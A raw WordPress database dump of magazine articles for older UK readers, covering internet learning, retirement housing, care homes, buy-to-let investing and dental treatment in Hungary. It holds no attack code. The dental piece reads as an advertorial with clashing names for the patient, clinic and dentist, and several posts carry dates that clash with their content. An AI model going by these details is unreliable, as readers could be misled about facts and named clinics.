st_url=\"http://westonspirit.org.uk/2011/08/how-doris-%e2%80%98met%e2%80%99-my-mother/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p>My mother has recently been reading Team of Rivals, the biography of Abraham Lincoln written by US author Doris Kearns Goodwin. The heavyweight tome was an acclaimed bestseller and followed an earlier biography of Franklin D and Eleanor Roosevelt which won Kearns Goodwin the Pulitzer Prize in 1995 and which my mother has also read.</p>&#13;\n<p>“Wouldn’t it be wonderful,” Ma said, “if Doris came here to give a lecture? I’d love to hear her talk in person.” And then she laughed at the absurd notion of a presidential historian and Harvard PhD turning up in a small corner of the Midlands where award-w</p>&#13;\n<p>inning, internationally celebrated writers are few and far between, despite the frequency of the bus service.</p>&#13;\n<p><img class=\"alignright size-medium wp-image-818\" style=\"border-style: initial; border-color: initial;\" title=\"NEW4\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/08/NEW4-300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" /></p>&#13;\n<p>But five minutes later, after a swift search on the internet, we had the next best thing. There was Kearns Goodwin in our kitchen or rather on YouTube delivering a 20-minute lecture in 2008 to a gathering of intellectuals in California about what the world can learn from American presidents past.</p>&#13;\n<p>She spoke with great insight and authority, as you’d expect, but also humour and warmth about Abraham Lincoln, how he revived a faltering political career to win an against-the-odds election victory and how his love of English literature shaped both his thinking and his oratory.</p>&#13;\n<p>It was a vivid example of how the internet can instantly expand one’s horizons and my mother was delighted by the experience, all the more so because, like a sizeable portion of her generation, she is not an internet user; as many as 6m Britons over 65 find the internet a mystery.</p>&#13;\n<p>The Kearns Goodwin YouTube performance has given her a taste of the possibilities now but I’ll also be pointing her in the direction of our feature on p17 about Race Online, the national campaign to encourage more people – of all ages – to use the internet with help from their peers.</p>&#13;\n<p>It includes one 105-year-old who has recently discovered how, from tracing old friends to rediscovering favourite bands of the past, the internet can enrich your life in any number of ways.</p>&#13;\n<p>Talking of rich lives, Joan Bakewell’s has been as exciting as it has been fulfilling, so far. One of the generation of women journalists who broke through into a male-dominated world in the 1960s, she has maintained a high-profile media career into her eighth decade, despite the industry’s obsession with youth. Yet even Dame Joan has bumped up against ageism professionally, as she tells interviewer Maureen Paton on p5: “The only people over 70 on TV now are David Dimbleby, Bruce Forsyth and David Attenborough.”</p>&#13;\n<p>Meanwhile, if you’re one of the millions staycationing this summer – or just looking for a day out – take a look at our centre pages where you’ll find a wealth of ideas. They include the annual Isle of Wight Garlic Festival where among the attractions there’s a garlic beer.</p>&#13;\n<p>That’s one thing the internet has yet to crack, of course: smell . . .</p>&#13;\n									</div>','How Doris ‘met’ my mother','493','publish','open','open','','how-doris-met-my-mother','','','2018-04-02 20:09:56','2018-04-02 20:09:56','',0,'http://westonspirit.org.uk/how-doris-met-my-mother.asp',0,'post','',0),(38,1,'2017-03-24 06:38:17','2017-03-24 06:38:17','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\"> </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Living the dream in later life\" st_url=\"http://westonspirit.org.uk/2011/08/living-the-dream-in-later-life/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Living the dream in later life\" st_url=\"http://westonspirit.org.uk/2011/08/living-the-dream-in-later-life/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Living the dream in later life\" st_url=\"http://westonspirit.org.uk/2011/08/living-the-dream-in-later-life/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Living the dream in later life\" st_url=\"http://westonspirit.org.uk/2011/08/living-the-dream-in-later-life/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Living the dream in later life\" st_url=\"http://westonspirit.org.uk/2011/08/living-the-dream-in-later-life/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Richmond Villages opens its doors to reveal a luxurious environment which has all the ingredients for a happy retirement</h4>&#13;\n<p>Award-winning Richmond Villages has five centres throughout the country, and the retirement village operator invited Senior Living along to its very latest creation, Richmond Letcombe Regis in Oxfordshire, for a tour with the village manager Elisabeth Parker.</p>&#13;\n<p>On arrival we were struck by the stunning surroundings. The term ‘village’ is wholly appropriate, since this truly is a community, where the luxuriously appointed homes are set in and around the village centre.</p>&#13;\n<p>The village centre is a tranquil but vibrant environment boasting a waterside restaurant, bar, library and wellness spa with gym, sauna, steam room, jacuzzi and pool. The bowling green is so perfectly maintained we barely dared breathe near it! There are treatment rooms for sessions with therapists or practitioners, and a well-equipped hairdressing and beauty salon. Weekly programmes schedule an extensive range of activities from book clubs and music appreciation to wine tasting and country walks.<img class=\"alignright size-medium wp-image-846\" title=\"NEW 13\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/08/NEW-13-200x300.jpg\" alt=\"\" width=\"200\" height=\"300\" /></p>&#13;\n<p>Elisabeth explained how the village was designed so retired people could continue the same independent lifestyle they always did, with access to gardens, countryside and a wide range of social and leisure activities without the day-to-day responsibilities and chores. “Since we can take care of any service, you can choose to do as much or as little, according to your needs or choice. Should you or your partner need increased assistance later on, this can be accommodated within the village, with minimum upheaval.”</p>&#13;\n<p>Next we viewed the apartments, which offer the ultimate in comfort, style and modern functionality, with fully equipped kitchens and en suite bathrooms, all fitted to top standards and specifications. Allocated parking spaces are available, but with a transport service for shopping trips and outings, car ownership is optional.</p>&#13;\n<p>Last stop was Richmond’s convenient and charming village shop and café. As we eyed up the diet-forsaking homemade cakes, they seemed to ooze the same sumptuous qualities of the village itself: quality ingredients combined with care and skill to produce the optimum in taste and indulgence.</p>&#13;\n<p>Richmond is anyone’s dream of a retirement home. You can enjoy luxurious living, an active social life, lots of leisure, and the one thing we all wish for at any age – peace of mind.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong><a title=\"www.richmond-villages.com\" href=\"http://www.richmond-villages.com/\" target=\"_blank\">www.richmond-villages.com</a></strong></em></p>&#13;\n									</div>','Living the dream in later life','380','publish','open','open','','living-the-dream-in-later-life','','','2018-04-02 20:09:54','2018-04-02 20:09:54','',0,'http://westonspirit.org.uk/living-the-dream-in-later-life.asp',0,'post','',0),(39,1,'2016-05-27 02:09:34','2016-05-27 02:09:34','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">10 August 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Logging on for life\" st_url=\"http://westonspirit.org.uk/2011/08/logging-on-for-life/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Logging on for life\" st_url=\"http://westonspirit.org.uk/2011/08/logging-on-for-life/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Logging on for life\" st_url=\"http://westonspirit.org.uk/2011/08/logging-on-for-life/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Logging on for life\" st_url=\"http://westonspirit.org.uk/2011/08/logging-on-for-life/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Logging on for life\" st_url=\"http://westonspirit.org.uk/2011/08/logging-on-for-life/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>You’re never too old to learn new skills – and when it comes to the internet, it can open up a new world of opportunity</h4>&#13;\n<p>At the Mecca Bingo club in Drumchapel, Glasgow, “eyes down” has a different meaning these days for pensioners like Margaret Melvin. Rather than scanning a bingo card for winning numbers, she is on Facebook keeping in touch with her sons Mark and Scott in Canada or viewing clips of Billy Cotton and her other favourite big bands on YouTube, or studying her family tree.</p>&#13;\n<h4 style=\"font-size: 13px;\"><img class=\"alignright size-medium wp-image-848\" style=\"border-style: initial; border-color: initial;\" title=\"NEW 14\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/08/NEW-14-300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" /></h4>&#13;\n<p>The internet is opening up a whole new world for the 105-year-old and reviving happy times. “It’s great fun looking back at the past and for places I used to go on holiday, like Broughty Ferry. It brings back lovely memories,” she says.</p>&#13;\n<p>Melvin, who lives in a care home, has been using the computers in a scheme hosted by the bingo hall under Race Online, a national campaign to encourage more people to access the internet founded by the government’s digital champion Martha Lane Fox.</p>&#13;\n<p>The internet remains a mystery to almost 6m Britons over 65, according to government figures. Many believe they have managed thus far and so, why bother? For others, using a computer can be a daunting prospect.</p>&#13;\n<p>To help people overcome their reservations, Race Online has created a network of digital champions – people who are proficient in using the internet and willing to pass on their knowledge to others.</p>&#13;\n<p>Malcolm Patman, 62, a digital champion in Nottinghamshire, says older people have misconceptions about computers and the internet. “Often they are afraid that they will break something but they want to learn because otherwise it seems that the world is passing them by,” says Patman.</p>&#13;\n<div class=\"woo-sc-quote\"><p>Many older people believe they have managed thus far and so, why bother with the internet? For others, using a computer can be a daunting prospect</p></div>&#13;\n<p>Patman runs courses for up to six people at a time in community locations including church halls, libraries and residential housing complexes, and his students have varied in age from mid-50s to 90s. It’s not important to learn how to use a computer, he says, but to understand its potential uses.</p>&#13;\n<p>Many people don’t realise, for example, that they can pay for their tax disc online without queuing at the post office or that they can pursue new interests, for example, by tracing their ancestors on genealogy websites.</p>&#13;\n<p>Frances Beatty, 64, from Salt in Staffordshire, is a digital ambassador with Age UK. Beatty runs courses mainly aimed at farmers and people living in rural areas. “The rural community is one where computer use is not widespread among older people,” she says. “These are people who have never been in an office.</p>&#13;\n<p>“Yet being able to use the internet is crucial to farmers who, for government purposes, have to record everything they do and keep records online. A family not able to do this for itself would need to pay about £500 a year employing an agent.” Beatty runs her courses in local halls and even farmhouses. “They are about giving people confidence,” she says.</p>&#13;\n<p>The move to increase the nation’s internet skills is also bringing the generations together. Explorer scouts have been helping elderly residents at De Clare Court retirement home in Haverfordwest, Pembrokeshire, to stay connected through a social networking site called FinerDay.</p>&#13;\n<p>With its larger fonts, it allows users to sort information into easily accessible files. All ages can sign up allowing family members to share emails, news, photographs and even receive reminders of upcoming birthdays.</p>&#13;\n<p>Margaret Baron, aged 64, one of the residents, says: “I have sisters in Germany and Australia, a cousin in the USA, and other family members are scattered from Edinburgh to Cornwall.</p>&#13;\n<p>“Many residents have benefited from the scouts’ help, including people who have medical problems and are less mobile. Being able to access the internet has transformed their lives.”</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<h3>Senior sites</h3>&#13;\n<p>Wired up and ready to go. Here are some cool sites to rev up your silver surfing</p>&#13;\n<h5>Park your cash</h5>&#13;\n<p>Got a spare parking space outside your front door, or possibly in your garage? Why not rent it out. According to Park at my House, punters may pay you up to £200 a month for the privilege of parking in your drive. You can list it on www.parkatmyhouse.com for free on the site but expect to pay commission when you successfully rent it out.</p>&#13;\n<h5>Music maestro, please</h5>&#13;\n<p>Forget expensive music downloads, you can listen to almost all your favourite music for free via www.spotify.com. Users get access to 13m tracks and albums; they can create playlists and share them with friends. The downside is the occasional advertisements in between tracks. However, you can avoid the ads by paying to become an unlimited member (£4.99 a month) or a premium member (£9.99 a month). Premium members can also stream Spotify to their mobile phones.</p>&#13;\n<h5>Thanks for the memory</h5>&#13;\n<p>It’s only natural that we should want to pass on our significant memories to our children and grandchildren, and a host of websites have sprung up to help us tell our stories – and have them published. These include www.biograph.co.uk and www.bookofmylife.co.uk. But it’s not cheap. Commissioning a biography from one of these sites costs a minimum of £1,750. If you want to write your own life story, tips are available at www.writemymemoirs.com</p>&#13;\n<h5>Senior discounts</h5>&#13;\n<p>Feeling the pension pinch? You can access a host of discounts available only to people aged 50-plus by becoming a member of the online community www.seniordiscounts.co.uk. It’s free to join and advertising is free too, so long as advertisers are willing to offer a discount to members.</p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<h3>Top tips for newbies</h3>&#13;\n<ul><li>Decide what you want to learn and achieve.</li>&#13;\n<li>Walk before you can run – take it slowly and familiarise yourself with the basics such as a mouse first.</li>&#13;\n<li>Only learn what you need to know –ignore the rest.</li>&#13;\n<li>Try things out – you won’t break anything by pressing the wrong button.</li>&#13;\n<li>Ask for help if you need it, especially from younger family members. Grandchildren may be the best people to explain computer and internet use.</li>&#13;\n</ul></div>&#13;\n									</div>','Logging on for life','1021','publish','open','open','','logging-on-for-life','','','2018-04-02 20:09:53','2018-04-02 20:09:53','',0,'http://westonspirit.org.uk/logging-on-for-life.asp',0,'post','',0),(40,1,'2014-06-07 17:35:27','2014-06-07 17:35:27','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">9 August 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\"></span>&#13;\n        </span></p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"On the move?\" st_url=\"http://westonspirit.org.uk/2011/08/on-the-move/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"On the move?\" st_url=\"http://westonspirit.org.uk/2011/08/on-the-move/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"On the move?\" st_url=\"http://westonspirit.org.uk/2011/08/on-the-move/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"On the move?\" st_url=\"http://westonspirit.org.uk/2011/08/on-the-move/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"On the move?\" st_url=\"http://westonspirit.org.uk/2011/08/on-the-move/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Leaving the family home is never easy for an elderly relative but sometimes there’s no choice. Here, three families share their tips</h4>&#13;\n<p>After the death of her father, Alison Hammond helped her mother, Mary Brown, 86, to downsize from the family home in Stockport, where she had lived for 45 years, into a sheltered apartment in Wantage, Oxfordshire – nearer to her daughter.</p>&#13;\n<h4 style=\"font-size: 13px;\"><img class=\"alignright size-medium wp-image-823\" style=\"border-style: initial; border-color: initial;\" title=\"200559207-010\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/08/NEW5-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /></h4>&#13;\n<p>Families need to give elderly parents or relatives plenty of time to think through such an important decision, says Hammond. “I wanted to make sure that I was doing what my mother wanted and making the decisions that she wanted me to make,” she says.</p>&#13;\n<p>Mother and daughter did not discuss any house moves until two years after their bereavement and then Hammond conducted the initial research. “I found this particular apartment and talked to her about it. My mother came down to see it and loved it.”</p>&#13;\n<div class=\"woo-sc-quote\"><p> “I wanted to make sure that I was doing what my mother wanted and making the decisions that she wanted me to make” – Alison Hammond</p></div>&#13;\n<p>Having selected the apartment to buy on a Pegasus development, Hammond made separate lists with her mother of what she wanted to take or leave, then drew up secondary lists about what would happen to the items she left behind.</p>&#13;\n<p>“The whole process made me realise that it is important to think and plan ahead,” says Hammond. “When my time comes, I don’t want to downsize in one go”. I’ll move from our four-bed detached into a three-bed semi, and then into an apartment.”</p>&#13;\n<p>Mary Brown had felt isolated in Stockport, not just because she was 175 miles away from her daughter but because the nearest amenities were a mile away. “My mother had to rely on neighbours to drive her everywhere. But now she can walk to the shops, she is more independent and much fitter – the change has been dramatic,” says Hammond.</p>&#13;\n<p>Access to local shops and facilities was one of the deciding factors in their choice of location. “We had looked at several others in similar complexes but they were in out-of-town communities. Here my mother has a lot more human contact, and the local shops have got to know her.”</p>&#13;\n<p>And while it is important to choose accommodation which suits the person’s needs now, you need to look ahead too.</p>&#13;\n<p>So at the Pegasus development, meals can be delivered and the bathroom features low-level furniture. “We thought it was important to think about what mum’s mobility might be like in five years,” adds Hammond.</p>&#13;\n<p>For Margaret Murray, 81, an assisted housing scheme with 24-hour onsite care has offered peace of mind to her and her family. Murray moved from her Carlisle home of 54 years to a one-bedroom flat in Burnside Court near the city, run by retirement housing specialists Anchor.</p>&#13;\n<p>“Moving here is the best thing I have ever done”, says Murray, who enjoys the reassurance of having help with washing and dressing, and emergency help on hand. Domestic tasks, such as cleaning and laundry, are also catered for.</p>&#13;\n<p>Residents eat together in a dining room and socialise in the lounge, which runs a daily activities programme and a film club. “I’ve never been so busy in my life. We have lovely little parties and get-togethers,” says Murray. “I’ve bumped into a lot of old faces from the bowling circuit.”</p>&#13;\n<p>After a long stay in hospital following a fall and serious illness, 77-year-old Brian Suddaby’s dementia had worsened. His family, social worker and hospital staff all agreed that returning home was not an option and that finding him a place in residential care was the best way forward.</p>&#13;\n<p>The family chose the modern, purpose-built Richmond Care Home in Sprotbrough, South Yorkshire, part of the Ladhar Group. “The big difference between this and others was that the staff showed an interest in who he was as a person before his accident and before the dementia set in,” says his daughter Claire Suddaby, 46.</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<h3>The Dilnot Review</h3>&#13;\n<p>The independent Commission on Funding of Care and Support, chaired by Andrew Dilnot, published its recommendations for government on the reform of adult social care in July. A White Paper is expected in 2017. The commission is calling for:</p>&#13;\n<ul><li>a lifetime cap of between £25,000 and £50,000 on an individual’s contributions to social care costs</li>&#13;\n<li>the means-tested threshold above which people have to pay their full care costs to rise from £23,250 to £100,000.</li>&#13;\n<li>a single threshold, across all local councils, for entitlement to care</li>&#13;\n<li>continuation of disability benefits</li>&#13;\n<li>people living in care homes to be responsible for paying their general living costs</li>&#13;\n<li>improved services for carers, with new legal rights to services</li>&#13;\n<li>the establishment of a national source of advice </li></ul></div>&#13;\n&#13;\n<p>Design considerations such as en suite facilities, wide windows and plenty of handrails played their part but the family were most reassured by a sense that they could still be close to their father, she says.</p>&#13;\n<p>“My mother can share meal times, either in dad’s room or the dining room. My parents have been married for 53 years and so there has been a big change for my mum as well. We are pleased that families are seen as important and we do not feel that he is isolated there.”</p>&#13;\n<p>The family also appreciate the home’s emphasis on being part of the community. Residents use local amenities such as the library, coffee shop and pub and visit the community centre and museum.</p>&#13;\n<p>“We chose a home which offers nursing care, even though he doesn’t need it at the moment. It is registered for EMI, which means that if his condition deteriorates we know that we do not have to move him,” adds Suddaby.</p>&#13;\n<p> </p>&#13;\n									</div>','On the move?','947','publish','open','open','','on-the-move','','','2018-04-02 20:09:51','2018-04-02 20:09:51','',0,'http://westonspirit.org.uk/on-the-move.asp',0,'post','',0),(41,1,'2017-09-13 10:16:52','2017-09-13 10:16:52','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">10 August 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> gnorwood\" title=\"Posts by Graham Norwood\" rel=\"author\"&gt;Graham Norwood</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Putting your money where the house is\" st_url=\"http://westonspirit.org.uk/2011/08/putting-your-money-where-the-house-is/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Putting your money where the house is\" st_url=\"http://westonspirit.org.uk/2011/08/putting-your-money-where-the-house-is/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Putting your money where the house is\" st_url=\"http://westonspirit.org.uk/2011/08/putting-your-money-where-the-house-is/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Putting your money where the house is\" st_url=\"http://westonspirit.org.uk/2011/08/putting-your-money-where-the-house-is/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Putting your money where the house is\" st_url=\"http://westonspirit.org.uk/2011/08/putting-your-money-where-the-house-is/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>With interest rates down in the doldrums, buy-to-let investments are once again an attractive option for savvy savers looking to boost their retirement income</h4>&#13;\n<p>For the investor approaching or enjoying retirement, deposit accounts with their paltry rates of return offer little interest (literally), while stock market volatility can make shares an equally unattractive bet for the cautious. Yet one investment has a long-term performance record outstripping most others: residential property, especially in the buy-to-let sector.</p>&#13;\n<p>Despite the downturn since 2007, capital values are much higher than ten years ago. The Halifax says that in early 2001 an average UK home cost £83,976; by early this year, the average had risen in value to £162,379, a return for an investor of over 95 per cent.</p>&#13;\n<h4 style=\"font-size: 13px;\"><img class=\"alignright size-medium wp-image-850\" style=\"border-style: initial; border-color: initial;\" title=\"NEW 15\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/08/NEW-15-200x300.jpg\" alt=\"\" width=\"200\" height=\"300\" /></h4>&#13;\n<p>Older investors seeking a regular income as well as a one-off profit when they sell are now well placed to take advantage of one of the strongest rental markets in recent years.</p>&#13;\n<p>Government figures show that in England alone the number of private renters rose from 2.15m in 2004 to 3.35m last year; the continuing shortage of mortgages for first-time buyers is forcing this figure up further month by month. Data from LSL Property Services, owner of Your Move, Reeds Rains and several other high street estate agencies, found that rents have been on the increase over the past five months, with some parts of the UK seeing a 7 per cent increase.</p>&#13;\n<p>The result is that buy-to-let is once again a profitable investment choice and perfect for a typical over-50-year-old who has equity from a home or pension pot to invest.</p>&#13;\n<div class=\"woo-sc-quote\"><p>No one can promise bricks and mortar will produce guaranteed profits, but the buy-to-let sector’s track record is robust</p></div>&#13;\n<p>There are two direct forms of buy-to-let. One is buying a home for long-term letting – a flat to rent to professionals moving into an area, or a house to be rented by sharing students, for example. The second is a holiday let – a cottage in a tourist location, typically rented to holidaymakers each week and perhaps used by the owner’s family, too.</p>&#13;\n<p>Retiree David Wright, 61, recently bought his first buy-to-let, a one-bedroom coach house at a Barratt Homes development in Ilkeston, Derbyshire, for £67,500. “The interest I’d get in a savings account doesn’t compare to the 7 per cent yield I’m getting as a landlord. Barratt handed the keys over at 12.15pm, the letting agent had booked two viewings for that afternoon and by close of play that day, I had secured a tenant,” he says.</p>&#13;\n<p>“I honestly believe that you can’t beat investing in bricks and mortar. As long as you’ve got the finances, do it. I’m considering investing in more properties.”</p>&#13;\n<p>Wright’s case is not unusual, and many older investors have already built up a portfolio; they treat buy-to-let as a full-time business, rather than simply a way of augmenting a pension.</p>&#13;\n<p>Clare and Richard Harvey, who are in their 50s, have several homes which they let out across the West Midlands, but are still buying – they have just snapped up a two-bedroom, two-bathroom apartment at St Paul’s City Lofts in central Sheffield.</p>&#13;\n<p>The first tenant will be their son Jonathan, 21, who is starting his final year studies at Sheffield Hallam University. The couple plan to keep the home for five to ten years to let out to future generations of students. “The central location gives me confidence that this property will continue to generate a positive income through our retirement,” explains Clare, a former teacher.</p>&#13;\n<p>A key consideration for any buy-to-let investor is, of course, getting the right, and most cost-effective, mortgage. “As long as rent from the property covers the mortgage, plus a margin for maintenance and running costs, the lender will assume the borrower won’t draw on retirement income to pay the mortgage,” says Melanie Bien, director of broker Private Finance. “Criteria differ between lenders. BM Solutions will allow a maximum age of 75 by the time the mortgage matures, while for Paragon it is 80 and for the Mortgage Works it is 90. You may need to opt for a shorter mortgage term than the usual 25 years, depending on your age when you take out the mortgage.”</p>&#13;\n<p>Mortgages for holiday lets, rather than longer-term buy-to-lets, are less common so an independent mortgage broker may be the best place to start. Bien also warns that on all investment property mortgages lenders may want hefty deposits – perhaps as much as 40 per cent of the purchase price.</p>&#13;\n<p>If a buy-to-let apartment or holiday cottage is not for you, and an indirect investment appeals, there are several residential funds. These are financial products: you buy into a fund, which in turn purchases property and generates income through renting it out.</p>&#13;\n<p>Two recently announced measures – a reduction in stamp duty payable for apartments and houses purchased by a fund, and a promise of lower capital gains tax on profits from one type of fund called a real estate investment trust – make this route even more attractive. An independent financial adviser will give impartial information on how to invest.</p>&#13;\n<p>No one can promise bricks and mortar will produce guaranteed profits, but the sector’s track record is robust. What is more, flats and houses are more affordable to investors than for many years, and demographics point to a long-term growth in the rental market.</p>&#13;\n<p>It all looks a lot more tempting than many rival forms of investment – or, for that matter, many pensions.</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<h3>Property hotspots</h3>&#13;\n<ol><li>Kent – Ebbsfleet is just 17 minutes to London St Pancras and new fast services will soon go to hitherto hard-to-reach Folkestone and Ramsgate, where an investor could buy a family house for £200,000.</li>&#13;\n<li>Lake District –one of the UK’s busiest tourist destinations as visitors do year-round walking tours, expanding the holiday letting season to 40 weeks. A pretty stone cottage, able to sleep five, will set you back £240,000.</li>&#13;\n<li>Exeter – Devon’s business capital is on the M5, expanding its university and soon to get a new John Lewis store. A prime-location, one-bedroom apartment costs about £130,000, while a two-bed is approximately £175,000.</li>&#13;\n<li>Central Birmingham – if the HS2 high-speed train link really does make Britain’s second city less than an hour from London, this will be a good long-term punt. For £300,000 you’ll get a well-located family house.</li>&#13;\n</ol><h3><div class=\"woo-sc-hr\"></div></h3>&#13;\n<h3>Golden rules</h3>&#13;\n<ul><li>Research locations – avoid city centres which are over-supplied with flats and anywhere with big public sector workforces; try areas short of student accommodation, enjoying year-round tourism or expanding private firms.</li>&#13;\n<li>Organise funding – interest-only mortgages are most cost-efficient but a broker can advise on latest products.</li>&#13;\n<li>Don’t be cheap – most long-term lets are unfurnished, holiday lets require furniture, but all require good-quality fixtures and fittings.</li>&#13;\n<li>Consider using a lettings agent – tax laws, health and safety regulations and tenancy rules change frequently, while renters can be demanding. Use an agent from trade body the Association of Residential Letting Agents.</li>&#13;\n</ul></div>&#13;\n									</div>','Putting your money where the house is','1150','publish','open','open','','putting-your-money-where-the-house-is','','','2018-04-02 20:09:50','2018-04-02 20:09:50','',0,'http://westonspirit.org.uk/putting-your-money-where-the-house-is.asp',0,'post','',0),(42,1,'2018-03-22 11:37:51','2018-03-22 11:37:51','<div class=\"entry\">\r\n\r\n&nbsp;\r\n<h4>Keeping your pearly whites in good order gets harder – and more expensive – as you age. Which is why more of us are successfully seeking cheaper treatment abroad</h4>\r\n&nbsp;\r\n\r\nMarting Howes couldn’t quite believe it. After losing a number of back teeth to gum disease and finding dentures didn’t work for him, the 58-year-old from Essex had been referred to a dental consultant <a href=\"https://www.theperfectsmile.co.uk/implant-dentistry/\">who recommended implants</a> – essentially artificial roots with crowns on top.\r\n\r\n&nbsp;\r\n\r\nThe procedure sounded pretty grim, but what really took Howes\'s breath away was the price: an estimated £10,000.\r\n\r\n&nbsp;\r\n<div class=\"woo-sc-quote\">\r\n\r\n“They confirmed what the consultant in the UK had said, so I knew they weren;t going to rip me off by recommending more work than I needed” -Willmott\r\n\r\n</div>\r\n<img class=\"alignright size-medium wp-image-833\" title=\"NEW7\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/08/NEW7-205x300.jpg\" alt=\"\" width=\"205\" height=\"300\" />\r\n\r\nA second opinion from a dentist in Cambridge produced an even higher estimate of £15,000.\r\n\r\n&nbsp;\r\n\r\nPaying a king’s ransom for crowns was an unappealing prospect, but so was living on soup for the rest of his days. Fortunately Willmott remembered reading about a third option, having dental work done more cheaply abroad, so he went on the internet to find out more.\r\n\r\n&nbsp;\r\n\r\nOne company particularly attracted him – <a href=\"http://www.perfectpractices.co.uk/\">Perfect Practices</a>. The head implant dentist, Dr A Roth has successfully installed more than 15,000 implants with a higher than 99 per cent success rate. The company was the first of its type to open a practice in the UK, when it opened in London’s Harley Street in 2007. However, much of the dentistry also takes place in the UK.\r\n\r\n&nbsp;\r\n\r\n“One of my concerns was what would happen if there were any problems after the treatment,” says Howes. “It would be a real pain to have to travel to London each time, so a company with a UK practice was a big advantage.”\r\n\r\n&nbsp;\r\n\r\nTPS\'s London office supplied references, and offered Howes a free consultation, which he decided to have in Hungary to check out the company and its facilities.\r\n\r\n&nbsp;\r\n\r\n“My initial impression was that all the dentists and support staff were welcoming and very professional,” says Howes. “The consulting room was clean and well equipped, and they more or less confirmed what the consultant in the UK had said, so I knew they weren’t going to rip me off by recommending more work than I needed.”\r\n\r\n&nbsp;\r\n\r\nThe first stage in Howes’s treatment was to lift his sinuses. It’s a major operation and he chose to have it done at Harley Street rather than having to convalesce in Hungary. Then over the course of about six months he made a couple of trips to Budapest for the implants, plus a more extended visit a few months later to have all the crowns fitted.\r\n\r\n&nbsp;\r\n\r\nEvery time the treatment and service were both first-class, says Howes. “They were really friendly and looked after me well.\r\n\r\n&nbsp;\r\n\r\nI chose to arrange my own travel and hotel but they’ll do it all for you if you wish. They meet you at the airport with a car and take you wherever you want to go, and they never let me down once.”\r\n\r\n&nbsp;\r\n\r\nAs a bonus, Budapest is a beautiful city and Howes was able to enjoy some sightseeing on his longer stays.\r\n\r\n&nbsp;\r\n\r\nDespite his initial concerns there were no problems with the treatment. “Given how much they did I was pleasantly surprised that everything healed so quickly,” he says.\r\n\r\n&nbsp;\r\n\r\nAt £9,300 including flights and hotels, the overall bill was less than half what Howes would have paid in the UK. Even treatment at the organisation’s Harley Street practice is significantly cheaper than using a UK dentist, because Hungarian practitioners simply don’t charge so much.\r\n\r\n&nbsp;\r\n\r\n“I’d become very disappointed with my UK dentist who didn’t seem interested in me as a patient: she couldn’t even get my name right,” says Willmott. “So now I go to DentistAbroad in Harley Street for all my dental treatment, and I think the quality is better than my UK dentist.”\r\n\r\n&nbsp;\r\n\r\nIndeed, Howes is now undergoing a second treatment which will be carried out in London next month. It is a single tooth replacement that costs usually costs £2,000-£2,500 in the UK. But at TPS’s Harley Street clinic it will cost only £995 –a saving of more than 50 per cent.\r\n\r\n&nbsp;\r\n\r\n“I’d certainly recommend Dr Attila Toth, Dr F Parker and all other dentists from the organisation to my friends, and if anyone needs a serious amount of work done then I think they’d be foolish not to consider the foreign treatment option.\r\n\r\n&nbsp;\r\n\r\n<strong>“I can’t fault TPS and I have no regrets. It’s been absolutely 